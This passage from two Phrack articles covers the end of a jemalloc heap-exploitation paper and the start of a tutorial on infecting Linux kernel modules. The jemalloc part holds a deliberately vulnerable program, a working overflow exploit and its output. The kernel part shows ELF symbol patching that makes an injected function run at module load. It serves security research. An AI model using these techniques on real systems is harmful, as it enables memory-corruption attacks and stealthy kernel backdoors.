mag_rack_t *
|
|
mag_rack_create(arena_t *arena)
|
|
{
|
|
...
|
|
return (arena_malloc_small(arena, sizeof(mag_rack_t) +
|
|
(sizeof(bin_mags_t) * (nbins - 1)), true));
|
|
}
|
|
|
|
|
|
Now, let's calculate the size of a magazine rack:
|
|
|
|
|
|
(gdb) print nbins
|
|
$6 = 30
|
|
(gdb) print sizeof(mag_rack_t) + (sizeof(bin_mags_t) * (nbins - 1))
|
|
$24 = 240
|
|
|
|
|
|
A size of 240 is actually serviced by the bin holding regions of 256 bytes.
|
|
Issuing calls to 'malloc(256)' will eventually end up in a user controlled
|
|
region physically bordering a 'mag_rack_t'. The following vulnerable code
|
|
emulates this situation (file vuln-mag.c):
|
|
|
|
|
|
/* The 'vulnerable' thread. */
|
|
void *vuln_thread_runner(void *arg) {
|
|
char *v;
|
|
|
|
v = (char *)malloc(256); /* [3-25] */
|
|
printf("[vuln] v = %p\n", v);
|
|
sleep(2);
|
|
|
|
if(arg)
|
|
strcpy(v, (char *)arg);
|
|
return NULL;
|
|
}
|
|
|
|
/* Other threads performing allocations. */
|
|
void *thread_runner(void *arg) {
|
|
size_t self = (size_t)pthread_self();
|
|
char *p1, *p2;
|
|
|
|
/* Allocation performed before the magazine rack is overflown. */
|
|
p1 = (char *)malloc(16);
|
|
printf("[%u] p1 = %p\n", self, p1);
|
|
sleep(4);
|
|
|
|
/* Allocation performed after overflowing the rack. */
|
|
p2 = (char *)malloc(16);
|
|
printf("[%u] p2 = %p\n", self, p2);
|
|
sleep(4);
|
|
return NULL;
|
|
}
|
|
|
|
int main(int argc, char *argv[]) {
|
|
size_t tcount, i;
|
|
pthread_t *tid, vid;
|
|
|
|
if(argc != 3) {
|
|
printf("%s <thread_count> <buff>\n", argv[0]);
|
|
return 0;
|
|
}
|
|
|
|
/* The fake 'mag_t' structure will be placed here. */
|
|
printf("[*] %p\n", getenv("FAKE_MAG_T"));
|
|
|
|
tcount = atoi(argv[1]);
|
|
tid = (pthread_t *)alloca(tcount * sizeof(pthread_t));
|
|
|
|
pthread_create(&vid, NULL, vuln_thread_runner, argv[2]);
|
|
for(i = 0; i < tcount; i++)
|
|
pthread_create(&tid[i], NULL, thread_runner, NULL);
|
|
|
|
pthread_join(vid, NULL);
|
|
for(i = 0; i < tcount; i++)
|
|
pthread_join(tid[i], NULL);
|
|
|
|
pthread_exit(NULL);
|
|
}
|
|
|
|
|
|
The vulnerable code spawns a, so called, vulnerable thread that performs an
|
|
allocation of 256 bytes. A user supplied buffer, 'argv[2]' is copied in it
|
|
thus causing a heap overflow. A set of victim threads are then created. For
|
|
demonstration purposes, victim threads have a very limited lifetime, their
|
|
main purpose is to force jemalloc initialize new 'mag_rack_t' structures.
|
|
As the comments indicate, the allocations stored in 'p1' variables take
|
|
place before the magazine rack is overflown while the ones stored in 'p2'
|
|
will get affected by the fake magazine rack (in fact, only one of them
|
|
will; the one serviced by the overflown rack). The allocations performed
|
|
by victim threads are serviced by the newly initialized magazine racks.
|
|
Since each magazine rack spans 256 bytes, it is highly possible that the
|
|
overflown region allocated by the vulnerable thread will lie somewhere
|
|
around one of them (this requires that both the target magazine rack and
|
|
the overflown region will be serviced by the same arena).
|
|
|
|
Once the attacker is able to corrupt a magazine rack, exploitation is just
|
|
a matter of overwriting the appropriate 'bin_mags' entry. The entry should
|
|
be corrupted in such a way that 'curmag' should point to a fake 'mag_t'
|
|
structure. The attacker can choose to either use a large 'nrounds' value to
|
|
pivot into the stack, or give arbitrary addresses as members of the void
|
|
pointer array, preferably the latter. The exploitation code given below
|
|
makes use of the void pointer technique (file exploit-mag.c):
|
|
|
|
|
|
int main(int argc, char *argv[]) {
|
|
char fake_mag_t[12 + 1];
|
|
char buff[1024 + 1];
|
|
size_t i, fake_mag_t_p;
|
|
|
|
if(argc != 2) {
|
|
printf("%s <mag_t address>\n", argv[0]);
|
|
return 1;
|
|
}
|
|
fake_mag_t_p = (size_t)strtoul(argv[1], NULL, 16);
|
|
|
|
/* Please read this...
|
|
*
|
|
* In order to void using NULL bytes, we use 0xffffffff as the value
|
|
* for 'nrounds'. This will force jemalloc picking up 0x42424242 as
|
|
* a valid region pointer instead of 0x41414141 :)
|
|
*/
|
|
printf("[*] Assuming fake mag_t is at %p\n", (void *)fake_mag_t_p);
|
|
*(size_t *)&fake_mag_t[0] = 0x42424242;
|
|
*(size_t *)&fake_mag_t[4] = 0xffffffff;
|
|
*(size_t *)&fake_mag_t[8] = 0x41414141;
|
|
fake_mag_t[12] = 0;
|
|
setenv("FAKE_MAG_T", fake_mag_t, 1);
|
|
|
|
/* The buffer that will overwrite the victim 'mag_rack_t'. */
|
|
printf("[*] Preparing input buffer\n");
|
|
for(i = 0; i < 256; i++)
|
|
*(size_t *)&buff[4 * i] = (size_t)fake_mag_t_p;
|
|
buff[1024] = 0;
|
|
|
|
printf("[*] Executing the vulnerable program\n");
|
|
execl("./vuln-mag", "./vuln-mag", "16", buff, NULL);
|
|
perror("execl");
|
|
return 0;
|
|
}
|
|
|
|
|
|
Let's compile and run the exploit code:
|
|
|
|
|
|
$ ./exploit-mag
|
|
./exploit-mag <mag_t address>
|
|
$ ./exploit-mag 0xdeadbeef
|
|
[*] Assuming fake mag_t is at 0xdeadbeef
|
|
[*] Preparing input buffer
|
|
[*] Executing the vulnerable program
|
|
[*] 0xbfbfedd6
|
|
...
|
|
|
|
|
|
The vulnerable code reports that the environment variable 'FAKE_MAG_T'
|
|
containing our fake 'mag_t' structure is exported at 0xbfbfedd6.
|
|
|
|
|
|
$ ./exploit-mag 0xbfbfedd6
|
|
[*] Assuming fake mag_t is at 0xbfbfedd6
|
|
[*] Preparing input buffer
|
|
[*] Executing the vulnerable program
|
|
[*] 0xbfbfedd6
|
|
[vuln] v = 0x28311100
|
|
[673283456] p1 = 0x28317800
|
|
...
|
|
[673283456] p2 = 0x42424242
|
|
[673282496] p2 = 0x3d545f47
|
|
|
|
|
|
Neat. One of the victim threads, the one whose magazine rack is overflown,
|
|
returns an arbitrary address as a valid region. Overwriting the thread
|
|
caches is probably the most lethal attack but it suffers from a limitation
|
|
which we do not consider serious. The fact that the returned memory region
|
|
and the 'bin_mags[]' element both receive arbitrary addresses, results in a
|
|
segfault either on the deallocation of 'p2' or once the thread dies by
|
|
explicitly or implicitly calling 'pthread_exit()'. Possible shellcodes
|
|
should be triggered _before_ the thread exits or the memory region is
|
|
freed. Fair enough... :)
|
|
|
|
|
|
--[ 4 - A real vulnerability
|
|
|
|
For a detailed case study on jemalloc heap overflows see the second Art of
|
|
Exploitation paper in this issue of Phrack.
|
|
|
|
|
|
--[ 5 - Future work
|
|
|
|
This paper is the first public treatment of jemalloc that we are aware
|
|
of. In the near future, we are planning to research how one can corrupt
|
|
the various red black trees used by jemalloc for housekeeping. The rbtree
|
|
implementation (defined in rb.h) is fully based on preprocessor macros
|
|
and it's quite complex in nature. Although we have already debugged them,
|
|
due to lack of time we didn't attempt to exploit the various tree
|
|
operations performed on rbtrees. We wish that someone will continue our
|
|
work from where we left of. If no one does, then you definitely know whose
|
|
articles you'll soon be reading :)
|
|
|
|
|
|
--[ 6 - Conclusion
|
|
|
|
We have done the first step in analyzing jemalloc. We do know, however,
|
|
that we have not covered every possible potential of corrupting the
|
|
allocator in a controllable way. We hope to have helped those that were
|
|
about to study the FreeBSD userspace allocator or the internals of Firefox
|
|
but wanted to have a first insight before doing so. Any reader that
|
|
discovers mistakes in our article is advised to contact us as soon as
|
|
possible and let us know.
|
|
|
|
Many thanks to the Phrack staff for their comments. Also, thanks to George
|
|
Argyros for reviewing this work and making insightful suggestions.
|
|
|
|
Finally, we would like to express our respect to Jason Evans for such a
|
|
leet allocator. No, that isn't ironic; jemalloc is, in our opinion, one of
|
|
the best (if not the best) allocators out there.
|
|
|
|
|
|
--[ 7 - References
|
|
|
|
[JESA] Standalone jemalloc
|
|
- http://www.canonware.com/cgi-bin/gitweb.cgi?p=jemalloc.git
|
|
|
|
[JEMF] Mozilla Firefox jemalloc
|
|
- http://hg.mozilla.org/mozilla-central/file/tip/memory/jemalloc
|
|
|
|
[JEFB] FreeBSD 8.2-RELEASE-i386 jemalloc
|
|
- http://www.freebsd.org/cgi/cvsweb.cgi/src/lib/libc/stdlib/
|
|
malloc.c?rev=1.183.2.5.4.1;content-type=text%2Fplain;
|
|
only_with_tag=RELENG_8_2_0_RELEASE
|
|
|
|
[JELX] Linux port of the FreeBSD jemalloc
|
|
- http://www.canonware.com/download/jemalloc/
|
|
jemalloc_linux_20080828a.tbz
|
|
|
|
[JE06] Jason Evans, A Scalable Concurrent malloc(3) Implementation for
|
|
FreeBSD
|
|
- http://people.freebsd.org/~jasone/jemalloc/bsdcan2006
|
|
/jemalloc.pdf
|
|
|
|
[PV10] Peter Vreugdenhil, Pwn2Own 2010 Windows 7 Internet Explorer 8
|
|
exploit
|
|
- http://vreugdenhilresearch.nl
|
|
/Pwn2Own-2010-Windows7-InternetExplorer8.pdf
|
|
|
|
[FENG] Alexander Sotirov, Heap Feng Shui in Javascript
|
|
- http://www.phreedom.org/research/heap-feng-shui/
|
|
heap-feng-shui.html
|
|
|
|
[HOEJ] Mark Daniel, Jake Honoroff, Charlie Miller, Engineering Heap
|
|
Overflow Exploits with Javascript
|
|
- http://securityevaluators.com/files/papers/isewoot08.pdf
|
|
|
|
[CVRS] Chris Valasek, Ryan Smith, Exploitation in the Modern Era
|
|
(Blueprint)
|
|
- https://www.blackhat.com/html/bh-eu-11/
|
|
bh-eu-11-briefings.html#Valasek
|
|
|
|
[VPTR] rix, Smashing C++ VPTRs
|
|
- http://www.phrack.org/issues.html?issue=56&id=8
|
|
|
|
[HAPF] huku, argp, Patras Heap Massacre
|
|
- http://fosscomm.ceid.upatras.gr/
|
|
|
|
[APHN] argp, FreeBSD Kernel Massacre
|
|
- http://ph-neutral.darklab.org/previous/0x7db/talks.html
|
|
|
|
[UJEM] unmask_jemalloc
|
|
- https://github.com/argp/unmask_jemalloc
|
|
|
|
|
|
--[ 8 - Code
|
|
|
|
--[ EOF
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x0b of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=----------------=[ Infecting loadable kernel modules ]=----------------=|
|
|
|=-------------------=[ kernel versions 2.6.x/3.0.x ]=-------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=----------------------------=[ by styx^ ]=-----------------------------=|
|
|
|=-----------------------=[ the.styx@gmail.com ]=------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
|
|
---[ Index
|
|
|
|
|
|
1 - Introduction
|
|
|
|
2 - Kernel 2.4.x method
|
|
2.1 - First try
|
|
2.2 - LKM loading explanations
|
|
2.3 - The relocation process
|
|
|
|
3 - Playing with loadable kernel modules on 2.6.x/3.0.x
|
|
3.1 - A first example of code injection
|
|
|
|
4 - Real World: Is it so simple?
|
|
4.1 - Static functions
|
|
4.1.1 - Local symbol
|
|
4.1.2 - Changing symbol bind
|
|
4.1.3 - Try again
|
|
4.2 - Static __init functions
|
|
4.3 - What about cleanup_module
|
|
|
|
5 - Real life example
|
|
5.1 - Inject a kernel module in /etc/modules
|
|
5.2 - Backdooring initrd
|
|
|
|
6 - What about other systems?
|
|
6.1 - Solaris
|
|
6.1.1 - A basic example
|
|
6.1.2 - Playing with OS modules
|
|
6.1.3 - Keeping it stealthy
|
|
6.2 - *BSD
|
|
6.2.1 - FreeBSD - NetBSD - OpenBSD
|
|
|
|
7 - Conclusion
|
|
|
|
8 - References
|
|
|
|
9 - Codes
|
|
9.1 - Elfstrchange
|
|
9.2 - elfstrchange.patch
|
|
|
|
|
|
---[ 1 - Introduction
|
|
|
|
|
|
In Phrack #61 [1] truff introduced a new method to infect a loadable kernel
|
|
module on Linux kernel x86 2.4.x series. Actually this method is currently
|
|
not compatible with the Linux kernel 2.6.x/3.0.x series due to the many
|
|
changes made in kernel internals. As a result, in order to infect a kernel
|
|
module, changing the name of symbols in .strtab section is not enough
|
|
anymore; the task has become a little bit trickier. In this article it
|
|
will be shown how to infect a kernel module on Linux kernel x86 2.6.*/3.0.x
|
|
series. All the methods discussed here have been tested on kernel version
|
|
2.6.35, 2.6.38 and 3.0.0 on Ubuntu 10.10, 11.04 and 11.10 and on kernel
|
|
version 2.6.18-238 on CentOS 5.6.
|
|
|
|
The proposed method has been tested only on 32-bit architectures: a 64-bit
|
|
adaptation is left as an exercise to the reader. Finally, I want to
|
|
clarify that the proposed paper is not innovative, but is only an update of
|
|
truff's paper.
|
|
|
|
|
|
---[ 2 - Kernel 2.4.x method
|
|
|
|
|
|
---[ 2.1 - First try
|
|
|
|
|
|
With the help of a simple example it will be explained why truff's method
|
|
is no longer valid: we are using the "elfstrchange" tool provided in his
|
|
paper. First, let's write a simple testing kernel module:
|
|
|
|
/****************** orig.c ***********************************************/
|
|
#include <linux/init.h>
|
|
#include <linux/module.h>
|
|
#include <linux/kernel.h>
|
|
#include <linux/errno.h>
|
|
|
|
MODULE_LICENSE("GPL");
|
|
|
|
int evil(void) {
|
|
|
|
printk(KERN_ALERT "Init Inject!");
|
|
|
|
return 0;
|
|
|
|
}
|
|
|
|
int init(void) {
|
|
|
|
printk(KERN_ALERT "Init Original!");
|
|
|
|
return 0;
|
|
}
|
|
|
|
void clean(void) {
|
|
|
|
printk(KERN_ALERT "Exit Original!");
|
|
|
|
return;
|
|
}
|
|
|
|
module_init(init);
|
|
module_exit(clean);
|
|
/****************** EOF **************************************************/
|
|
|
|
The module_init macro is used to register the initialization function of
|
|
the loadable kernel module: in other words, the function which is called
|
|
when the module is loaded, is the init() function. Reciprocally the
|
|
module_exit macro is used to register the termination function of the LKM
|
|
which means that in our example clean() will be invoked when the module is
|
|
unloaded. These macros can be seen as the constructor/destructor
|
|
declaration of the LKM object. A more exhaustive explanation can be found
|
|
in section 2.2.
|
|
|
|
Below is the associated Makefile:
|
|
|
|
/****************** Makefile *********************************************/
|
|
obj-m += orig.o
|
|
|
|
KDIR := /lib/modules/$(shell uname -r)/build
|
|
PWD := $(shell pwd)
|
|
|
|
default:
|
|
$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules
|
|
|
|
clean:
|
|
$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) clean
|
|
/****************** EOF **************************************************/
|
|
|
|
Now the module can be compiled and the testing can start:
|
|
|
|
$ make
|
|
...
|
|
|
|
Truff noticed that altering the symbol names located in the .strtab section
|
|
was enough to fool the resolution mechanism of kernel v2.4. Indeed the
|
|
obj_find_symbol() function of modutils was looking for a specific symbol
|
|
("init_module") using its name [1]:
|
|
|
|
/*************************************************************************/
|
|
module->init = obj_symbol_final_value(f, obj_find_symbol(f,
|
|
SPFX "init_module"));
|
|
module->cleanup = obj_symbol_final_value(f, obj_find_symbol(f,
|
|
SPFX "cleanup_module"));
|
|
/*************************************************************************/
|
|
|
|
Let's have a look at the ELF symbol table of orig.ko:
|
|
|
|
$ objdump -t orig.ko
|
|
|
|
orig.ko: file format elf32-i386
|
|
|
|
SYMBOL TABLE:
|
|
|
|
...
|
|
|
|
00000040 g F .text 0000001b evil
|
|
00000000 g O .gnu.linkonce.this_module 00000174 __this_module
|
|
00000000 g F .text 00000019 cleanup_module
|
|
00000020 g F .text 0000001b init_module
|
|
00000000 g F .text 00000019 clean
|
|
00000000 *UND* 00000000 mcount
|
|
00000000 *UND* 00000000 printk
|
|
00000020 g F .text 0000001b init
|
|
|
|
We want to setup evil() as the initialization function instead of init().
|
|
Truff was doing it in two steps:
|
|
|
|
1. renaming init to dumm
|
|
2. renaming evil to init
|
|
|
|
This can easily be performed using his tool, "elfstrchange", slightly
|
|
bug-patched (see section 9):
|
|
|
|
$ ./elfstrchange orig.ko init dumm
|
|
[+] Symbol init located at 0xa91
|
|
[+] .strtab entry overwritten with dumm
|
|
|
|
$ ./elfstrchange orig.ko evil init
|
|
[+] Symbol evil located at 0xa4f
|
|
[+] .strtab entry overwritten with init
|
|
|
|
$ objdump -t orig.ko
|
|
|
|
...
|
|
|
|
00000040 g F .text 0000001b init <-- evil()
|
|
00000000 g O .gnu.linkonce.this_module 00000174 __this_module
|
|
00000000 g F .text 00000019 cleanup_module
|
|
00000020 g F .text 0000001b init_module
|
|
00000000 g F .text 00000019 clean
|
|
00000000 *UND* 00000000 mcount
|
|
00000000 *UND* 00000000 printk
|
|
00000020 g F .text 0000001b dumm <-- init()
|
|
|
|
Now we're loading the module:
|
|
|
|
$ sudo insmod orig.ko
|
|
$ dmesg |tail
|
|
...
|
|
|
|
[ 2438.317831] Init Original!
|
|
|
|
As we can see the init() function is still invoked. Applying the same
|
|
method with "init_module" instead of init doesn't work either. In the next
|
|
subsection the reasons of this behaviour are explained.
|
|
|
|
|
|
---[ 2.2 LKM loading explanations
|
|
|
|
|
|
In the above subsection I briefly mentioned the module_init and
|
|
module_exit macros. Now let's analyze them. In kernel v2.4 the entry and
|
|
exit functions of the LKMs were init_module() and cleanup_module(),
|
|
respectively. Nowadays, with kernel v2.6, the programmer can choose the
|
|
name he prefers for these functions using the module_init() and
|
|
module_exit() macros. These macros are defined in "include/linux/init.h"
|
|
[3]:
|
|
|
|
|
|
/*************************************************************************/
|
|
#ifndef MODULE
|
|
|
|
[...]
|
|
|
|
#else /* MODULE */
|
|
|
|
[...]
|
|
|
|
/* Each module must use one module_init(). */
|
|
#define module_init(initfn) \
|
|
static inline initcall_t __inittest(void) \
|
|
{ return initfn; } \
|
|
int init_module(void) __attribute__((alias(#initfn)));
|
|
|
|
/* This is only required if you want to be unloadable. */
|
|
#define module_exit(exitfn) \
|
|
static inline exitcall_t __exittest(void) \
|
|
{ return exitfn; } \
|
|
void cleanup_module(void) __attribute__((alias(#exitfn)));
|
|
|
|
[...]
|
|
|
|
#endif /*MODULE*/
|
|
/*************************************************************************/
|
|
|
|
|
|
We are only interested in the "loadable module" case, that is when MODULE
|
|
is defined. As you can see, init_module is always declared as an alias of
|
|
initfn, the argument of the module_init macro. As a result, the compiler
|
|
will always produce identical symbols in the relocatable object: one for
|
|
initfn and one for "module_init". The same rule applies for the termination
|
|
function, if the unloading mechanism is compiled in the kernel (that is if
|
|
CONFIG_MODULE_UNLOAD is defined).
|
|
|
|
When a module is compiled, first the compiler creates an object file for
|
|
each source file, then it generates an additional generic source file,
|
|
compiles it and finally links all the relocatable objects together.
|
|
|
|
In the case of orig.ko, orig.mod.c is the file generated and compiled as
|
|
orig.mod.o. The orig.mod.c follows:
|
|
|
|
/*************************************************************************/
|
|
#include <linux/module.h>
|
|
#include <linux/vermagic.h>
|
|
#include <linux/compiler.h>
|
|
|
|
MODULE_INFO(vermagic, VERMAGIC_STRING);
|
|
|
|
struct module __this_module
|
|
__attribute__((section(".gnu.linkonce.this_module"))) = {
|
|
.name = KBUILD_MODNAME,
|
|
.init = init_module,
|
|
#ifdef CONFIG_MODULE_UNLOAD
|
|
.exit = cleanup_module,
|
|
#endif
|
|
.arch = MODULE_ARCH_INIT,
|
|
};
|
|
|
|
static const struct modversion_info ____versions[]
|
|
__used
|
|
__attribute__((section("__versions"))) = {
|
|
{ 0x4d5503c4, "module_layout" },
|
|
{ 0x50eedeb8, "printk" },
|
|
{ 0xb4390f9a, "mcount" },
|
|
};
|
|
|
|
static const char __module_depends[]
|
|
__used
|
|
__attribute__((section(".modinfo"))) =
|
|
"depends=";
|
|
|
|
|
|
MODULE_INFO(srcversion, "EE786261CA9F9F457DF0EB5");
|
|
/*************************************************************************/
|
|
|
|
This file declares and partially initializes a struct module which will be
|
|
stored in the ".gnu.linkonce.this_module" section of the object file. The
|
|
module struct is defined in "include/linux/module.h":
|
|
|
|
/*************************************************************************/
|
|
struct module
|
|
{
|
|
[...]
|
|
|
|
/* Unique handle for this module */
|
|
char name[MODULE_NAME_LEN];
|
|
|
|
[...]
|
|
|
|
/* Startup function. */
|
|
int (*init)(void);
|
|
|
|
[...]
|
|
|
|
/* Destruction function. */
|
|
void (*exit)(void);
|
|
|
|
[...]
|
|
};
|
|
/*************************************************************************/
|
|
|
|
So when the compiler auto-generates the C file, it always makes the .init
|
|
and .exit fields of the struct pointing to the function "init_module" and
|
|
"cleanup_module". But the corresponding functions are not declared in this
|
|
C file so they are assumed external and their corresponding symbols are
|
|
declared undefined (*UND*):
|
|
|
|
$ objdump -t orig.mod.o
|
|
|
|
orig.mod.o: file format elf32-i386
|
|
|
|
SYMBOL TABLE:
|
|
[...]
|
|
00000000 *UND* 00000000 init_module
|
|
00000000 *UND* 00000000 cleanup_module
|
|
|
|
When the linking with the other objects is performed, the compiler is then
|
|
able to solve this issue thanks to the aliasing performed by the
|
|
module_init() and module_exit() macros.
|
|
|
|
$ objdump -t orig.ko
|
|
|
|
00000000 g F .text 0000001b evil
|
|
00000000 g O .gnu.linkonce.this_module 00000184 __this_module
|
|
00000040 g F .text 00000019 cleanup_module
|
|
00000020 g F .text 0000001b init_module
|
|
00000040 g F .text 00000019 clean
|
|
00000000 *UND* 00000000 mcount
|
|
00000000 *UND* 00000000 printk
|
|
00000020 g F .text 0000001b init
|
|
|
|
The aliasing can be seen as a smart trick to allow the compiler to declare
|
|
and fill the __this_module object without too much trouble. This object is
|
|
essential for the loading of the module in the v2.6.x/3.0.x kernels.
|
|
|
|
To load the LKM, a userland tool (insmod/modprobe/etc.) calls the
|
|
sys_init_module() syscall which is defined in "kernel/module.c":
|
|
|
|
/*************************************************************************/
|
|
SYSCALL_DEFINE3(init_module, void __user *, umod,
|
|
unsigned long, len, const char __user *, uargs)
|
|
{
|
|
struct module *mod;
|
|
int ret = 0;
|
|
|
|
...
|
|
|
|
/* Do all the hard work */
|
|
mod = load_module(umod, len, uargs);
|
|
|
|
...
|
|
|
|
/* Start the module */
|
|
if (mod->init != NULL)
|
|
ret = do_one_initcall(mod->init);
|
|
...
|
|
}
|
|
/*************************************************************************/
|
|
|
|
The load_module() function returns a pointer to a "struct module" object
|
|
when the LKM is loaded in memory. As stated in the source code,
|
|
load_module() handles the main tasks associated with the loading and as
|
|
such is neither easy to follow nor to explain in a few sentences. However
|
|
there are two important things that you should know:
|
|
|
|
- load_module() is responsible for the ELF relocations
|
|
- the mod->init is holding the relocated value stored in __this_module
|
|
|
|
Note: Because __this_module is holding initialized function pointers (the
|
|
address of init() and clean() in our example), there has to be a relocation
|
|
at some point.
|
|
|
|
After the relocation is performed, mod->init() refers to the kernel mapping
|
|
of init_module() and can be called through do_one_initcall() which is
|
|
defined in "init/main.c":
|
|
|
|
/*************************************************************************/
|
|
int __init_or_module do_one_initcall(initcall_t fn)
|
|
{
|
|
int count = preempt_count();
|
|
int ret;
|
|
|
|
if (initcall_debug)
|
|
ret = do_one_initcall_debug(fn); <-- init_module() may be
|
|
else called here
|
|
ret = fn(); <-- or it may be called
|
|
here
|
|
msgbuf[0] = 0;
|
|
|
|
...
|
|
|
|
return ret;
|
|
}
|
|
/*************************************************************************/
|
|
|
|
|
|
---[ 2.3 - The relocation process
|
|
|
|
|
|
The relocation itself is handled by the load_module() function and without
|
|
any surprise the existence of the corresponding entries can be found in the
|
|
binary:
|
|
|
|
$ objdump -r orig.ko
|
|
|
|
./orig.ko: file format elf32-i386
|
|
|
|
...
|
|
|
|
RELOCATION RECORDS FOR [.gnu.linkonce.this_module]:
|
|
OFFSET TYPE VALUE
|
|
000000d4 R_386_32 init_module
|
|
00000174 R_386_32 cleanup_module
|
|
|
|
This means that the relocation has to patch two 32-bit addresses (because
|
|
type == R_386_32) located at:
|
|
|
|
- (&.gnu.linkonce.this_module = &__this_module) + 0xd4 [patch #1]
|
|
- (&.gnu.linkonce.this_module = &__this_module) + 0x174 [patch #2]
|
|
|
|
A relocation entry (in a 32-bit environment) is an Elf32_Rel object and
|
|
is defined in "/usr/include/elf.h":
|
|
|
|
/*************************************************************************/
|
|
typedef struct
|
|
{
|
|
Elf32_Addr r_offset; /* Address */
|
|
Elf32_Word r_info; /* Relocation type and symbol index
|
|
*/
|
|
} Elf32_Rel;
|
|
|
|
#define ELF32_R_SYM(val) ((val) >> 8)
|
|
/*************************************************************************/
|
|
|
|
The important thing to remember is that the symbol is located using
|
|
ELF32_R_SYM() which provides an index in the table of symbols, the .symtab
|
|
section.
|
|
|
|
This can be easily seen:
|
|
|
|
$ readelf -S ./orig.ko | grep gnu.linkonce
|
|
[10] .gnu.linkonce.thi PROGBITS 00000000 000240 000184 00 WA 0 0 32
|
|
[11] .rel.gnu.linkonce REL 00000000 0007f8 000010 08 16 10 4
|
|
|
|
The relocation section associated with section 10 is thus section 11.
|
|
|
|
$ readelf -x 11 orig.ko
|
|
|
|
Hex dump of section '.rel.gnu.linkonce.this_module':
|
|
0x00000000 d4000000 01160000 74010000 01150000 ........t.......
|
|
|
|
So ELF32_R_SYM() is returning 0x16 (=22) for the first relocation and 0x1b
|
|
(=21) for the second one. Now let's see the table of symbols:
|
|
|
|
$ readelf -s .orig.ko
|
|
|
|
Symbol table '.symtab' contains 33 entries:
|
|
Num: Value Size Type Bind Vis Ndx Name
|
|
0: 00000000 0 NOTYPE LOCAL DEFAULT UND
|
|
|
|
...
|
|
|
|
21: 00000040 25 FUNC GLOBAL DEFAULT 2 cleanup_module
|
|
22: 00000020 27 FUNC GLOBAL DEFAULT 2 init_module
|
|
|
|
...
|
|
|
|
This is a perfect match. So when the LKM is loaded:
|
|
|
|
- The kernel performs a symbol resolution and the corresponding symbols
|
|
are updated with a new value. At his point init_module and
|
|
cleanup_module are holding kernel space addresses.
|
|
|
|
- The kernel performs the required relocations using the index in the
|
|
table of symbols to know how to patch. When the relocation is
|
|
performed __this_module has been patched twice.
|
|
|
|
At this point it should be clear that the address value of the init_module
|
|
symbol has to be modified if we want to call evil() instead of init().
|
|
|
|
|
|
---[ 3 - Playing with loadable kernel modules on 2.6.x/3.0.x
|
|
|
|
|
|
As pointed out above, the address of the init_module symbol has to be
|
|
modified in order to invoke the evil() function at loading time. Since the
|
|
LKM is a relocatable object, this address is calculated using the offset
|
|
(or relative address) stored in the st_value field of the Elf32_Sym
|
|
structure [2], defined in "/usr/include/elf.h":
|
|
|
|
/*************************************************************************/
|
|
typedef struct
|
|
{
|
|
Elf32_Word st_name; /* Symbol name (string tbl index) */
|
|
Elf32_Addr st_value; /* Symbol value */
|
|
Elf32_Word st_size; /* Symbol size */
|
|
unsigned char st_info; /* Symbol type and binding */
|
|
unsigned char st_other; /* Symbol visibility */
|
|
Elf32_Section st_shndx; /* Section index */
|
|
} Elf32_Sym;
|
|
/*************************************************************************/
|
|
|
|
$ objdump -t orig.ko
|
|
|
|
orig.ko: file format elf32-i386
|
|
|
|
SYMBOL TABLE:
|
|
|
|
...
|
|
|
|
00000040 g F .text 0000001b evil
|
|
00000000 g O .gnu.linkonce.this_module 00000174 __this_module
|
|
00000000 g F .text 00000019 cleanup_module
|
|
00000020 g F .text 0000001b init_module
|
|
00000000 g F .text 00000019 clean
|
|
00000000 *UND* 00000000 mcount
|
|
00000000 *UND* 00000000 printk
|
|
00000020 g F .text 0000001b init
|
|
|
|
The objdump output shows that:
|
|
|
|
- the relative address of evil() is 0x00000040;
|
|
- the relative address of init_module() is 0x00000020;
|
|
- the relative address of init() is 0x00000020;
|
|
|
|
Altering these offsets is enough to have evil() being called instead of
|
|
init_module() because the relocation process in the kernel will produce the
|
|
corresponding "poisoned" virtual address.
|
|
|
|
The orig.ko has to look like this:
|
|
|
|
00000040 g F .text 0000001b evil
|
|
...
|
|
00000040 g F .text 0000001b init_module
|
|
|
|
To do so, we can use my 'elfchger' script in order to modify the ELF file.
|
|
The code structure is the same as truff's one, with some minor changes.
|
|
The script takes the following input parameters:
|
|
|
|
./elfchger -s [symbol] -v [value] <module_name>
|
|
|
|
Where [value] represents the new relative address of the [symbol]
|
|
(init_module in our case) in <module_name>:
|
|
|
|
Let's apply it to our example:
|
|
|
|
$ ./elfchger -s init_module -v 00000040 orig.ko
|
|
[+] Opening orig.ko file...
|
|
[+] Reading Elf header...
|
|
>> Done!
|
|
[+] Finding ".symtab" section...
|
|
>> Found at 0x77c
|
|
[+] Finding ".strtab" section...
|
|
>> Found at 0x7a4
|
|
[+] Getting symbol' infos:
|
|
>> Symbol found at 0x99c
|
|
>> Index in symbol table: 0x16
|
|
[+] Replacing 0x00000020 with 0x00000040... done!
|
|
|
|
The ELF file is now changed:
|
|
|
|
$ objdump -t orig.ko
|
|
|
|
orig.ko: file format elf32-i386
|
|
|
|
SYMBOL TABLE:
|
|
...
|
|
|
|
00000040 g F .text 0000001b evil
|
|
00000000 g O .gnu.linkonce.this_module 00000174 __this_module
|
|
00000000 g F .text 00000019 cleanup_module
|
|
00000040 g F .text 0000001b init_module
|
|
00000000 g F .text 00000019 clean
|
|
00000000 *UND* 00000000 mcount
|
|
00000000 *UND* 00000000 printk
|
|
00000020 g F .text 0000001b init
|
|
|
|
Let's load the module:
|
|
|
|
$ sudo insmod orig.ko
|
|
|
|
$ dmesg | tail
|
|
...
|
|
|
|
[ 5733.929286] Init Inject!
|
|
|
|
$
|
|
|
|
As expected the evil() function is invoked instead of init() when the
|
|
module is loaded.
|
|
|
|
|
|
---[ 3.1 A first example of code injection
|
|
|
|
The next step is the injection of external code inside the original module
|
|
(orig.ko). A new kernel module (evil.ko) will be injected into orig.ko.
|
|
We will use both orig.c and evil.c source codes:
|
|
|
|
/***************************** orig.c ************************************/
|
|
#include <linux/init.h>
|
|
#include <linux/module.h>
|
|
#include <linux/kernel.h>
|
|
#include <linux/errno.h>
|
|
|
|
MODULE_LICENSE("GPL");
|
|
|
|
int init_module(void) {
|
|
|
|
printk(KERN_ALERT "Init Original!");
|
|
|
|
return 0;
|
|
}
|
|
|
|
void clean(void) {
|
|
|
|
